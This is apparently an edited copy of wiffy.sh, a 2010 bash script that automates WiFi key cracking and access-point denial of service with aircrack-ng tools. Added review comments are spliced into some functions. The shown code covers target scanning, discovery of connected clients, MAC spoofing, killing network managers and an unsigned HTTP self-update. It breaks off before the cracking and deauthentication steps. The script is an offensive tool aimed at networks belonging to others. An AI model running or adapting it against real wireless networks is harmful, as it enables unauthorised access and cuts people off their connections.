  1. #!/bin/bash
  2. #----------------------------------------------------------------------------------------------#
  3. #wiffy.sh v0.1 (#5 2010-09-13) #
  4. # (C)opyright 2010 - g0tmi1k #
  5. #---License------------------------------------------------------------------------------------#
  6. # This program is free software: you can redistribute it and/or modify it under the terms #
  7. # of the GNU General Public License as published by the Free Software Foundation, either #
  8. # version 3 of the License, or (at your option) any later version. #
  9. # #
  10. # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; #
  11. # without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. #
  12. # See the GNU General Public License for more details. #
  13. # #
  14. # You should have received a copy of the GNU General Public License along with this program. #
  15. # If not, see <http://www.gnu.org/licenses/>. #
  16. #---Important----------------------------------------------------------------------------------#
  17. # *** Do NOT use this for illegal or malicious use *** #
  18. #---Defaults-----------------------------------------------------------------------------------#
  19. # The interfaces you use
  20. interface="wlan0"
  21.  
  22. # [crack/dos] Crack - cracks WiFi Keys, dos - blocks access to ap.
  23. mode="crack"
  24.  
  25. # [random/set/false] Change the MAC address
  26. macMode="set"
  27. fakeMac="00:05:7c:9a:58:3f"
  28.  
  29. # [/path/to/the/folder] The file used to brute force WPA keys.
  30. wordlist="/pentest/passwords/wordlists/wpa.txt"
  31.  
  32. # [true/false] Connect to network afterwords
  33. extras="false"
  34.  
  35. # [true/false] diagnostics = Creates a output file displays exactly whats going on. [0/1/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands
  36. diagnostics="false"
  37. verbose="0"
  38.  
  39. #---Variables----------------------------------------------------------------------------------#
  40. version="0.1 (#5)" # Version
  41. monitorInterface="mon0" # Default
  42. bssid="" # null the value
  43. essid="" # null the value
  44. channel="" # null the value
  45. client="" # null the value
  46. debug="false" # Windows don't close, shows extra stuff
  47. logFile="wiffy.log" # filename of output
  48. trap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)
  49.  
  50. #----Functions---------------------------------------------------------------------------------#
#######################################
# findAP: scan for access points on $interface and fill the global arrays
# (arrayBSSID, arrayChannel, arrayProtected, arrayQuality, arrayEncryption,
# arrayESSID) from the `iwlist scan` output, one entry per network in scan
# order.  When the global $bssid or $essid matches a scanned network, the
# global $id is set to that network's index.
# Globals read:    interface, bssid, essid, verbose, diagnostics
# Globals written: id, index, command and the six arrays above
# Side effects:    overwrites /tmp/wiffy.tmp (left behind) and /tmp/wiffy.ssid (removed)
# NOTE(review): fixed, predictable file names in the shared /tmp directory --
# a pre-existing file or symlink of that name is overwritten/followed by the
# `>` redirection.  Every pipeline below also depends on the exact text layout
# of iwlist output, which differs between wireless-tools versions.
#######################################
function findAP () { #findAP
# The scan runs inside an xterm (via action) and is waited for; its saved
# output is the single source for everything parsed below.
action "Scanning network" "rm -f /tmp/wiffy.tmp && iwlist $interface scan > /tmp/wiffy.tmp" $verbose $diagnostics "true"
#arrayESSID=( $(cat /tmp/wiffy.tmp | awk -F":" '/ESSID/{print $2}') )
# NOTE(review): the trailing \' after the awk program on the next two lines
# looks like a paste artifact (the quote is otherwise unterminated);
# awk '{print $5}' / awk '{print $2}' is presumably intended -- confirm
# against the original file.
arrayBSSID=( $(cat /tmp/wiffy.tmp | grep "Address:" | awk '{print $5}\') )
arrayChannel=( $(cat /tmp/wiffy.tmp | grep "Channel:" | tr ':' ' ' | awk '{print $2}\') )
# Text after "key:" for each network (expected to be "on" or "off")
arrayProtected=( $(cat /tmp/wiffy.tmp | grep "key:" | sed 's/.*key://g') )
# Text after "Quality=" up to the first blank
arrayQuality=( $(cat /tmp/wiffy.tmp | grep "Quality" | sed 's/.*Quality=//g' | awk -F " " '{print $1}' ) )

# Classify each network's encryption and locate the one selected with -b, if any
id=""
index="0"
for item in "${arrayBSSID[@]}"; do
if [ "$bssid" ] && [ "$bssid" == "$item" ] ; then id="$index" ;fi
# Look for a "WPA" marker within the 20 lines after this BSSID (GNU sed address form;
# the BSSID is spliced into the sed address unescaped)
command=$(cat /tmp/wiffy.tmp | sed -n "/$item/, +20p" | grep "WPA" )
if [ "$command" ] ; then arrayEncryption[$index]="WPA"
# NOTE(review): unquoted expansion -- an empty entry turns this test into a syntax error
elif [ ${arrayProtected[$index]} == "off" ] ; then arrayEncryption[$index]="N/A"
else arrayEncryption[$index]="WEP" ; fi
index=$(($index+1))
done

#-Cheap hack to support essids with spaces in-----------------------------------------------------------
# ESSIDs are written one per line (surrounding quotes stripped) and read back
# line by line, so names containing spaces survive; the array-from-$(...) form
# used above would split them into several entries.  Also locates the -e selection.
# (`read` without -r: backslashes in a name are interpreted, leading/trailing blanks dropped.)
cat /tmp/wiffy.tmp | awk -F":" '/ESSID/{print $2}' | sed 's/\"//' | sed 's/\(.*\)\"/\1/' > /tmp/wiffy.ssid
index="0"
while read line ; do
if [ "$essid" ] && [ "$essid" == "$line" ] ; then id="$index" ; fi
arrayESSID[$index]="$line"
index=$(($index+1))
done < "/tmp/wiffy.ssid"
rm -f /tmp/wiffy.ssid
#--------------------------------------------------------------------------------------------------------------
}
#######################################
# findClient: run airodump-ng against the selected AP for a few seconds and
# record the first associated client MAC it reports; called when no client
# is known.
# Arguments: $1 - encryption type of the AP ("WEP", "N/A" or "WPA")
# Globals read:    error, bssid, channel, monitorInterface, essid, verbose,
#                  diagnostics, debug
# Globals written: client (a MAC, or "clientless" when none was seen), essid
#                  (filled in from the capture when it was empty), command
# Side effects:    creates and removes /tmp/wiffy.dump*; kills the airodump-ng
#                  processes found via ps (except those whose ps line contains "cap")
# Returns: 0 on success, 1 on a coding error (empty $1)
# NOTE(review): $error is only ever set to "1" here, never to "free" -- the
# success path depends on the value left behind by the most recent action() or
# display() call, so a preceding failed action() makes this function fail too.
#######################################
function findClient () { #findClient $encryption
if [ -z "$1" ] ; then error="1" ; fi # Coding error
if [ "$error" == "free" ] ; then
client=""
action "Removing temp files" "rm -f /tmp/wiffy.dump* && sleep 1" $verbose $diagnostics "true"
# Backgrounded so the capture keeps running while this function polls its netxml output
action "airodump-ng (client(s))" "airodump-ng --bssid $bssid --channel $channel --write /tmp/wiffy.dump --output-format netxml $monitorInterface" $verbose $diagnostics "true" &
sleep 3

if [ "$1" == "WEP" ] || [ "$1" == "N/A" ] ; then # N/A = For MAC filtering
# One fixed wait, then take whatever (if anything) has shown up
sleep 5
client=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "client-mac" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' | head -1)
elif [ "$1" == "WPA" ] ; then
# NOTE(review): no timeout -- this polls every 2 s until a client-mac element appears
while [ -z "$client" ] ; do
sleep 2
client=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "client-mac" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' | head -1)
done
fi

# An empty $essid (e.g. a hidden network) is taken from the capture's essid element
if [ -z "$essid" ] ; then
essid=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "<essid cloaked=\"false\">" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/')
if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "*hidden* essid=$essid" $diagnostics ; fi
fi

# Space-separated PIDs of airodump-ng processes; the grep/awk lines and any
# line containing "cap" are filtered out of the ps listing
command=$(ps aux | grep "airodump-ng" | awk '!/grep/ && !/awk/ && !/cap/ {print $2}' | while read line; do echo -n "$line "; done | awk '{print}')
if [ -n "$command" ] ; then
action "Killing programs" "kill $command" $verbose $diagnostics "true"
sleep 1
fi

action "Removing temp files" "rm -f /tmp/wiffy.dump*" $verbose $diagnostics "true"
if [ "$client" == "" ] ; then client="clientless" ; fi
if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "client=$client" $diagnostics ; fi
return 0
else
display error "findClient. Error code: $error" $diagnostics 1>&2
return 1
fi
}
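#######################################
# update: replace this script with the copy hosted in the project's svn trunk,
# then exit.  Uses `svn` when it is installed, otherwise `wget`.
# Globals read: version, diagnostics
# Exits: 2 always (the running copy should be restarted)
# NOTE(review): the download is plain HTTP with no signature or checksum
# check, so the fetched file is trusted solely on the transport; a tampered
# copy would later run with the root privileges this script requires.
#######################################
function update() { # update
  local remoteRev
  if [ -e "/usr/bin/svn" ] ; then
    display action "Checking for an update..." "$diagnostics"
    # Strip the label instead of cutting at a fixed column, so the revision
    # number is extracted regardless of the label's width.
    remoteRev=$(svn info http://g0tmi1k.googlecode.com/svn/trunk/wiffy/ | sed -n 's/^Last Changed Rev: *//p')
    # $version is "<release> (#<rev>)"; compare against the remote revision with
    # the same release prefix (a fixed prefix would force a download every time).
    if [ "$version" != "${version%% *} (#$remoteRev)" ] ; then
      display info "Updating..." "$diagnostics"
      svn export -q --force http://g0tmi1k.googlecode.com/svn/trunk/wiffy/wiffy.sh wiffy.sh
      display info "Updated to $remoteRev. (=" "$diagnostics"
    else
      display info "You're using the latest version. (=" "$diagnostics"
    fi
  else
    display info "Updating..." "$diagnostics"
    wget -nv -N http://g0tmi1k.googlecode.com/svn/trunk/wiffy/wiffy.sh
    display info "Updated! (=" "$diagnostics"
  fi
  echo
  exit 2
}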
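#######################################
# cleanup: stop helper programs, take the monitor interface down and remove
# the script's temporary files, then exit.
# Arguments: $1 - "nonuser" (not root: exit 3 without touching anything),
#                 "clean" (normal finish), anything else (interrupt / error)
# Globals read: verbose, diagnostics, debug, monitorInterface
# Exits: 3 for "nonuser", otherwise 0
#######################################
function cleanup() { # cleanup mode
  local iface tmpFiles f
  if [ "$1" == "nonuser" ] ; then exit 3 ; fi

  action "Killing xterm" "killall xterm" "$verbose" "$diagnostics" "true"
  if [ "$1" != "clean" ] ; then
    echo # Blank line
    if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "*** BREAK ***" "$diagnostics" ; fi # User quit
  fi
  display action "Restoring: Environment" "$diagnostics"

  # Only stop monitor mode when the interface really exists.  -F -w matches the
  # name literally and as a whole word (mon0 must not match mon01).
  iface=$(ifconfig -a | grep -F -w -- "$monitorInterface" | awk '{print $1}')
  if [ "$iface" == "$monitorInterface" ] ; then
    sleep 3 # Sometimes it needs to catch up/wait
    action "Monitor Mode (Stopping)" "airmon-ng stop $monitorInterface" "$verbose" "$diagnostics" "true"
  fi

  if [ "$debug" != "true" ] ; then
    # Build the list of temp files to delete.  action() runs its command as a
    # shell string inside xterm, so the globs stay literal here and expand
    # there; compgen -G tests for matches without parsing `ls` output.
    tmpFiles=""
    if compgen -G "/tmp/wiffy-*.cap" > /dev/null ; then tmpFiles="$tmpFiles /tmp/wiffy-*" ; fi
    if compgen -G "/tmp/wiffy.dump*.netxml" > /dev/null ; then tmpFiles="$tmpFiles /tmp/wiffy.dump*" ; fi
    if compgen -G "replay_arp*.cap" > /dev/null ; then tmpFiles="$tmpFiles replay_arp*.cap" ; fi
    for f in /tmp/wiffy.key /tmp/wiffy.tmp /tmp/wiffy.conf /tmp/wiffy.handshake ; do
      if [ -e "$f" ] ; then tmpFiles="$tmpFiles $f" ; fi
    done
    if [ -n "$tmpFiles" ] ; then action "Removing temp files" "rm -rfv --$tmpFiles" "$verbose" "$diagnostics" "true" ; fi
  fi

  echo -e "\e[01;36m[*]\e[00m Done! (= Have you... g0tmi1k?"
  exit 0
}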
#######################################
# help: print the usage text (with the current defaults filled in) and exit
# with status 1.
# Globals read: interface, monitorInterface, mode, wordlist, macMode, fakeMac, logFile
#######################################
function help() {
  # Unquoted delimiter so the $variables in the text are expanded.
  cat <<EOF
(C)opyright 2010 g0tmi1k ~ http://g0tmi1k.blogspot.com

Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack/dos] -e [essid] -b [bssid]
-c [mac] -w [/path/to/file] (-z / -s [mac]) -x -d (-v / -V) ([-u] [-?])

Options:
-i --- Internet Interface e.g. $interface
-t --- Monitor Interface e.g. $monitorInterface

-m --- Mode. e.g. $mode

-e --- ESSID (WiFi Name)
-b --- BSSID (AP MAC Address)
-c --- Client that is connect to the acess point

-w --- Path to Wordlist e.g. $wordlist

-z --- Change interface's MAC Address e.g. $macMode
-s --- Use this MAC Address e.g. $fakeMac

-x --- Connect to network afterwords

-d --- Diagnostics (Creates output file, $logFile)
-v --- Verbose (Displays more)
-V --- (Higher) Verbose (Displays more + shows commands)

-u --- Update
-? --- This



Known issues:
-WEP
> Didn't detect my client
+ Add it in manually
+ Re-run the script
> IV's doesn't increae
+ DeAuth didn't work --- Client using Windows 7?
+ Use a different router/client

-WPA
> You can ONLY crack WPA when:
+ The ESSID is known
+ The WiFi key is in the word-list
+ There is a connected client

-Doesn't detect any/my wireless network
> Don't run from a virtual machine
> Driver issue - Use a different WiFi device
> Try the 're[f]resh' option
> Unplug WiFi device, wait, replug
> You're too close/far away

-"Extras" doesn't work
> Network doesn't have a DHCP server

-Slow
> Try a different attack... manually!

EOF
  exit 1
}
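#######################################
# action: run a command in a new xterm window (so several tools can run side
# by side), optionally echoing and logging it.
# Arguments: $1 - window title (appended to "wiffy v<version> - ")
#            $2 - command line, passed to `xterm -e` as ONE string and
#                 therefore re-parsed by a shell inside the xterm
#            $3 - verbose level; "2" prints the command before running it
#            $4 - diagnostics; "true" appends "$1~$2" to $logFile
#            $5 - "true" to also tee the command's output into $logFile
#            $6 - optional "x|y|lines" window geometry (default 100|0|15)
#            $7 - "hold" keeps the xterm open after the command finishes
# Globals read:    version, logFile, diagnostics
# Globals written: error ("free" on success, "1" on missing arguments),
#                  command, xterm, x, y, lines -- deliberately NOT local:
#                  findClient() reads $error as left by the last action()/display() call.
# Returns: 0 on success, 1 if $1 or $2 is empty (recorded as a coding error)
# NOTE(review): because $2 is re-parsed by a shell, any value a caller splices
# into it (an ESSID taken from scan output, for instance) is interpreted as
# shell syntax, not data; the \"...\" callers wrap around names does not make
# them inert.  Treat scanned names as untrusted input.
#######################################
function action() { # action title command $verbose $diagnostics screen&file x|y|lines hold
  error="free"
  if [ -z "$1" ] || [ -z "$2" ] ; then error="1" ; fi # Coding error
  if [ "$error" == "free" ] ; then
    xterm="xterm" #Defaults
    command=$2
    x="100"
    y="0"
    lines="15"
    if [ "$7" == "hold" ] ; then xterm="$xterm -hold" ; fi
    if [ "$3" == "2" ] ; then printf 'Command: %s\n' "$command" ; fi
    if [ "$4" == "true" ] ; then printf '%s~%s\n' "$1" "$command" >> "$logFile" ; fi
    # $logFile is left unquoted inside the string on purpose: the string is
    # re-parsed by the xterm shell, where the path is a single word.
    if [ "$4" == "true" ] && [ "$5" == "true" ] ; then command="$command | tee -a $logFile" ; fi
    if [ -n "$6" ] ; then
      # Geometry fields; cut keeps the existing behaviour when a field is missing
      x=$(printf '%s\n' "$6" | cut -d'|' -f1)
      y=$(printf '%s\n' "$6" | cut -d'|' -f2)
      lines=$(printf '%s\n' "$6" | cut -d'|' -f3)
    fi
    # $xterm is intentionally unquoted so "xterm -hold" splits into two words
    $xterm -geometry "100x$lines+$x+$y" -T "wiffy v$version - $1" -e "$command"
    return 0
  else
    display error "action. Error code: $error" "$diagnostics" 1>&2
    echo -e "---------------------------------------------------------------------------------------------\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7" >> "$logFile"
    return 1
  fi
}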
  260. function display() { # display type message $diagnostics
  261. error="free"
  262. if [ -z "$1" ] || [ -z "$2" ] ; then error="1" ; fi # Coding error
  263. if [ "$1" != "action" ] && [ "$1" != "info" ] && [ "$1" != "diag" ] && [ "$1" != "error" ] ; then error="5"; fi # Coding error
  264. if [ "$error" == "free" ] ; then
  265. output=""
  266. if [ "$1" == "action" ] ; then output="\e[01;32m[>]\e[00m" ; fi
  267. if [ "$1" == "info" ] ; then output="\e[01;33m[i]\e[00m" ; fi
  268. if [ "$1" == "diag" ] ; then output="\e[01;34m[+]\e[00m" ; fi
  269. if [ "$1" == "error" ] ; then output="\e[01;31m[-]\e[00m" ; fi
  270. output="$output $2"
  271. echo -e "$output"
  272. if [ "$3" == "true" ] ; then
  273. if [ "$1" == "action" ] ; then output="[>]" ; fi
  274. if [ "$1" == "info" ] ; then output="[i]" ; fi
  275. if [ "$1" == "diag" ] ; then output="[+]" ; fi
  276. if [ "$1" == "error" ] ; then output="[-]" ; fi
  277. echo -e "---------------------------------------------------------------------------------------------\n$output $2" >> $logFile
  278. fi
  279. return 0
  280. else
  281. display error "display. Error code: $error" $logFile 1>&2
  282. echo -e "---------------------------------------------------------------------------------------------\n-->ERROR: display (Error code: $error): $1 , $2 , $3 " >> $logFile ;
  283. return 1
  284. fi
  285. }
  286.  
  287.  
  288. #----------------------------------------------------------------------------------------------#
  289. echo -e "\e[01;36m[*]\e[00m wiffy v$version"
  290.  
  291. #----------------------------------------------------------------------------------------------#
  292. while getopts "i:t:m:e:b:c:w:z:s:xdvVu?" OPTIONS; do
  293. case ${OPTIONS} in
  294. i ) interface=$OPTARG;;
  295. t ) monitorInterface=$OPTARG;;
  296. m ) mode=$OPTARG;;
  297. e ) essid=$OPTARG;;
  298. b ) bssid=$OPTARG;;
  299. c ) client=$OPTARG;;
  300. w ) wordlist=$OPTARG;;
  301. z ) macMode=$OPTARG;;
  302. s ) fakeMac=$OPTARG;;
  303. x ) extras="true";;
  304. d ) diagnostics="true";;
  305. v ) verbose="1";;
  306. V ) verbose="2";;
  307. u ) update;;
  308. ? ) help;;
  309. * ) display error "Unknown option." $diagnostics 1>&2 ;; # Default
  310. esac
  311. done
  312.  
  313. #----------------------------------------------------------------------------------------------#
  314. if [ "$debug" == "true" ] ; then
  315. display info "Debug mode" $diagnostics
  316. fi
  317. if [ "$diagnostics" == "true" ] ; then
  318. display diag "Diagnostics mode" $diagnostics
  319. echo -e "wiffy v$version\n$(date)" > $logFile
  320. echo "wiffy.sh" $* >> $logFile
  321. fi
  322.  
  323. #----------------------------------------------------------------------------------------------#
  324. display action "Analyzing: Environment" $diagnostics
  325.  
  326. #----------------------------------------------------------------------------------------------#
  327. if [ "$(id -u)" != "0" ] ; then display error "Not a superuser." $diagnostics 1>&2 ; cleanup nonuser; fi
  328.  
  329. #----------------------------------------------------------------------------------------------#
  330. command=""
  331. tmp=$(ls /tmp/wiffy-*.cap 2> /dev/null)
  332. if [ "$tmp" ] ; then command="$command /tmp/wiffy-*" ; fi
  333. tmp=$(ls /tmp/wiffy.dump*.netxml 2> /dev/null)
  334. if [ "$tmp" ] ; then command="$command /tmp/wiffy.dump*" ; fi
  335. tmp=$(ls replay_arp*.cap 2> /dev/null)
  336. if [ "$tmp" ] ; then command="$command replay_arp*.cap" ; fi
  337. if [ -e "/tmp/wiffy.key" ] ; then command="$command /tmp/wiffy.key" ; fi
  338. if [ -e "/tmp/wiffy.tmp" ] ; then command="$command /tmp/wiffy.tmp" ; fi
  339. if [ -e "/tmp/wiffy.conf" ] ; then command="$command /tmp/wiffy.conf" ; fi
  340. if [ -e "/tmp/wiffy.handshake" ] ; then command="$command /tmp/wiffy.handshake" ; fi
  341. if [ ! -z "$command" ] ; then action "Removing old files" "rm -rfv $command" $verbose $diagnostics "true" ; fi
  342.  
  343. #----------------------------------------------------------------------------------------------#
  344. if [ -z "$interface" ] ; then display error "interface can't be blank" $diagnostics 1>&2 ; cleanup; fi
  345. if [ -z "$monitorInterface" ] ; then display error "monitorInterface can't be blank" $diagnostics 1>&2 ; cleanup; fi
  346. if [ "$mode" != "crack" ] && [ "$mode" != "dos" ] ; then display error "mode ($mode) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  347. if [ ! -e "$wordlist" ] ; then display error "There isn't a wordlist at $wordlist" $diagnostics 1>&2 ; cleanup; fi
  348. if [ "$macMode" != "random" ] && [ "$macMode" != "set" ] && [ "$macMode" != "false" ] ; then display error "macMode ($macMode) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  349. if [ "$macMode" == "set" ] ; then if [ -z "$fakeMac" ] || [ ! $(echo $fakeMac | egrep "^([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}$") ] ; then display error "fakeMac ($fakeMac) isn't correct" $diagnostics 1>&2 ; cleanup; fi ; fi
  350. if [ "$mode" == "crack" ] && [ "$extras" != "true" ] && [ "$extras" != "false" ] ; then display error "extras ($extras) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  351. if [ "$diagnostics" != "true" ] && [ "$diagnostics" != "false" ] ; then display error "diagnostics ($diagnostics) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  352. if [ "$verbose" != "0" ] && [ "$verbose" != "1" ] && [ "$verbose" != "2" ] ; then display error "verbose ($verbose) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  353. if [ -z "$version" ] ; then display error "version ($version) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  354. if [ "$debug" != "true" ] && [ "$debug" != "false" ] ; then display error "debug ($debug) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  355. if [ "$diagnostics" == "true" ] && [ -z "$logFile" ] ; then display error "logFile ($logFile) isn't correct" $diagnostics 1>&2 ; cleanup ; fi
  356.  
  357. #----------------------------------------------------------------------------------------------#
  358. command=$(iwconfig $interface 2>/dev/null | grep "802.11" | cut -d" " -f1)
  359. if [ ! $command ]; then
  360. display error "$interface isn't a wireless interface." $diagnostics
  361. display info "Searching for a wireless interface" $diagnostics
  362. command=$(iwconfig 2>/dev/null | grep "802.11" | cut -d" " -f1) #| awk '!/"'"$interface"'"/'
  363. if [ $command ] ; then
  364. interface=$command
  365. display info "Found $interface" $diagnostics
  366. else
  367. display error "Couldn't find a wireless interface." $diagnostics 1>&2
  368. cleanup
  369. fi
  370. fi
  371.  
  372. command=$(ifconfig -a | grep $interface | awk '{print $1}')
  373. if [ "$command" != "$interface" ] ; then
  374. display error "The wireless interface $interface, isn't correct." $diagnostics 1>&2
  375. if [ "$debug" == "true" ] ; then iwconfig; fi
  376. cleanup
  377. fi
  378.  
  379. #----------------------------------------------------------------------------------------------#
  380. mac=$(macchanger --show $interface | awk -F " " '{print $3}')
  381.  
  382. #----------------------------------------------------------------------------------------------#
  383. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Stopping: Programs" $diagnostics ; fi
  384. command=$(ps aux | grep $interface | awk '!/grep/ && !/awk/ && !/wiffy/ {print $2}' | while read line; do echo -n "$line "; done | awk '{print}')
  385. if [ -n "$command" ] ; then
  386. action "Killing programs" "kill $command" $verbose $diagnostics "true" # to prevent interference
  387. fi
  388. action "Killing 'Programs'" "killall wicd-client airodump-ng xterm" $verbose $diagnostics "true" # Killing "wicd-client" to prevent channel hopping
  389. action "Killing 'wicd service'" "/etc/init.d/wicd stop" $verbose $diagnostics "true" # Stopping wicd to prevent channel hopping
  390.  
  391. #----------------------------------------------------------------------------------------------#
  392. action "Refreshing interface" "ifconfig $interface down && ifconfig $interface up && sleep 1" $verbose $diagnostics "true"
  393. loopMain="false"
  394. while [ "$loopMain" != "true" ] ; do
  395. findAP
  396. if [ "$id" ] ; then
  397. loopMain="true"
  398. else
  399. if [ "$essid" ] ; then display error "Couldnt find essid ($essid)" $diagnostics 1>&2 ; fi
  400. if [ "$bssid" ] ; then display error "Couldnt find bssid ($bssid)" $diagnostics 1>&2 ; fi
  401. loop=${#arrayBSSID[@]}
  402. echo -e " Num | ESSID | BSSID | Protected | Cha | Quality\n-----|------------------------|-------------------|-----------|-----|---------"
  403. for (( i=0;i<$loop;i++)); do
  404. printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\n' "$(($i+1))" "${arrayESSID[${i}]}" "${arrayBSSID[${i}]}" "${arrayProtected[${i}]}" "${arrayEncryption[${i}]}" "${arrayChannel[${i}]}" "${arrayQuality[${i}]}"
  405. done
  406. loopSub="false"
  407. while [ "$loopSub" != "true" ] ; do
  408. read -p "[~] re[s]can, re[f]resh, e[x]it or select num: "
  409. if [ "$REPLY" == "x" ] ; then cleanup clean
  410. elif [ "$REPLY" == "s" ] ; then loopSub="true" # aka do nothing
  411. elif [ "$REPLY" == "f" ] ; then action "Refreshing interface" "ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1" $verbose $diagnostics "true" && loopSub="true" # aka do nothing
  412. elif [ -z $(echo "$REPLY" | tr -dc '[:digit:]'l) ] ; then display error "Bad input, $REPLY" $diagnostics 1>&2
  413. elif [ "$REPLY" -lt 1 ] || [ "$REPLY" -gt $loop ] ; then display error "Incorrect number, $REPLY" $diagnostics 1>&2
  414. else id="$(($REPLY-1))" ; loopSub="true" ; loopMain="true"
  415. fi
  416. done
  417. fi
  418. done
  419. essid="${arrayESSID[$id]}"
  420. bssid="${arrayBSSID[$id]}"
  421. channel="${arrayChannel[$id]}"
  422. encryption="${arrayEncryption[$id]}"
  423.  
  424. #----------------------------------------------------------------------------------------------#
  425. if [ "$diagnostics" == "true" ] ; then
  426. echo "-Settings------------------------------------------------------------------------------------
  427. interface=$interface
  428. monitorInterface=$monitorInterface
  429. mode=$mode
  430. essid=$essid
  431. bssid=$bssid
  432. encryption=$encryption
  433. channel=$channel
  434. client=$client
  435. wordlist=$wordlist
  436. mac=$mac
  437. macMode=$macMode
  438. fakeMac=$fakeMac
  439. diagnostics=$diagnostics
  440. verbose=$verbose
  441. debug=$debug
  442. -Environment---------------------------------------------------------------------------------" >> $logFile
  443. display diag "Detecting: Kernal" $diagnostics
  444. uname -a >> $logFile
  445. display diag "Detecting: Hardware" $diagnostics
  446. lspci -knn >> $logFile
  447. fi
  448. if [ "$debug" == "true" ] || [ "$verbose" != "0" ] ; then
  449. display info " interface=$interface
  450. \e[01;33m[i]\e[00m monitorInterface=$monitorInterface
  451. \e[01;33m[i]\e[00m mode=$mode
  452. \e[01;33m[i]\e[00m essid=$essid
  453. \e[01;33m[i]\e[00m bssid=$bssid
  454. \e[01;33m[i]\e[00m encryption=$encryption
  455. \e[01;33m[i]\e[00m channel=$channel
  456. \e[01;33m[i]\e[00m client=$client
  457. \e[01;33m[i]\e[00m wordlist=$wordlist
  458. \e[01;33m[i]\e[00m mac=$mac
  459. \e[01;33m[i]\e[00m macMode=$macMode
  460. \e[01;33m[i]\e[00m fakeMac=$fakeMac
  461. \e[01;33m[i]\e[00m diagnostics=$diagnostics
  462. \e[01;33m[i]\e[00m verbose=$verbose
  463. \e[01;33m[i]\e[00m debug=$debug"
  464. fi
  465.  
  466. #----------------------------------------------------------------------------------------------#
  467. if [ ! -e "/usr/sbin/airmon-ng" ] && [ ! -e "/usr/local/sbin/airmon-ng" ] ; then
  468. display error "aircrack-ng isn't installed." $diagnostics 1>&2
  469. read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
  470. if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install aircrack-ng" "apt-get -y install aircrack-ng" $verbose $diagnostics "true" ; fi
  471. if [ ! -e "/usr/sbin/airmon-ng" ] && [ ! -e "/usr/local/sbin/airmon-ng" ] ; then
  472. display error "Failed to install aircrack-ng" $diagnostics 1>&2 ; cleanup
  473. else
  474. display info "Installed aircrack-ng" $diagnostics
  475. fi
  476. fi
  477. if [ ! -e "/usr/bin/macchanger" ] ; then
  478. display error "macchanger isn't installed." $diagnostics
  479. read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
  480. if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install macchanger" "apt-get -y install macchanger" $verbose $diagnostics "true" ; fi
  481. if [ ! -e "/usr/bin/macchanger" ] ; then
  482. display error "Failed to install macchanger" $diagnostics 1>&2 ; cleanup
  483. else
  484. display info "Installed macchanger" $diagnostics
  485. fi
  486. fi
  487. #if [ "$attack" == "inject" ] ; then
  488. # if [ ! -e "/pentest/wireless/airpwn-1.4/airpwn" ] ; then
  489. # display error "airpwn isn't installed." $diagnostics
  490. # read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
  491. # if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install airpwn" "apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev" $verbose $diagnostics "true" ; fi
  492. # action "Install airpwn" "wget -P /tmp http://downloads.sourceforge.net/project/airpwn/airpwn/1.4/airpwn-1.4.tgz && tar -C /pentest/wireless -xvf /tmp/airpwn-1.4.tgz && rm /tmp/airpwn-1.4.tgz" $verbose $diagnostics "true"
  493. # find="#include <linux/if.h>\n#ifndef _LINUX_WIRELESS_H"
  494. # replace="#ifndef _LINUX_WIRELESS_H"
  495. # sed "s/$find/$replace/g" "/usr/include/linux/wireless.h" > "/usr/include/linux/wireless.h.new"
  496. # find="#ifndef _LINUX_WIRELESS_H"
  497. # replace="#include <linux/if.h>\n#ifndef _LINUX_WIRELESS_H"
  498. # sed "s/$find/$replace/g" "/usr/include/linux/wireless.h.new" > "/usr/include/linux/wireless.h"
  499. # rm -f "/usr/include/linux/wireless.h.new"
  500. # action "Install airpwn" "command=$(pwd) && tar -C /pentest/wireless/airpwn-1.4 -xvf /pentest/wireless/airpwn-1.4/lorcon-current.tgz && cd /pentest/wireless/airpwn-1.4/lorcon && ./configure && make && make install && cd $command" $verbose $diagnostics "true"
  501. # action "Install airpwn" "command=$(pwd) && cd /pentest/wireless/airpwn-1.4 && ./configure && make && cd $command" $verbose $diagnostics "true"
  502. # if [ ! -e "/pentest/wireless/airpwn-1.4/airpwn" ] ; then
  503. # display error "Failed to install airpwn" $diagnostics 1>&2 ; cleanup
  504. # else
  505. # display info "Installed airpwn" $diagnostics
  506. # fi
  507. # fi
  508. #fi
  509.  
  510. #----------------------------------------------------------------------------------------------#
  511. display action "Configuring: Environment" $diagnostics
  512.  
  513. #----------------------------------------------------------------------------------------------#
  514. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Configuring: Wireless card" $diagnostics ; fi
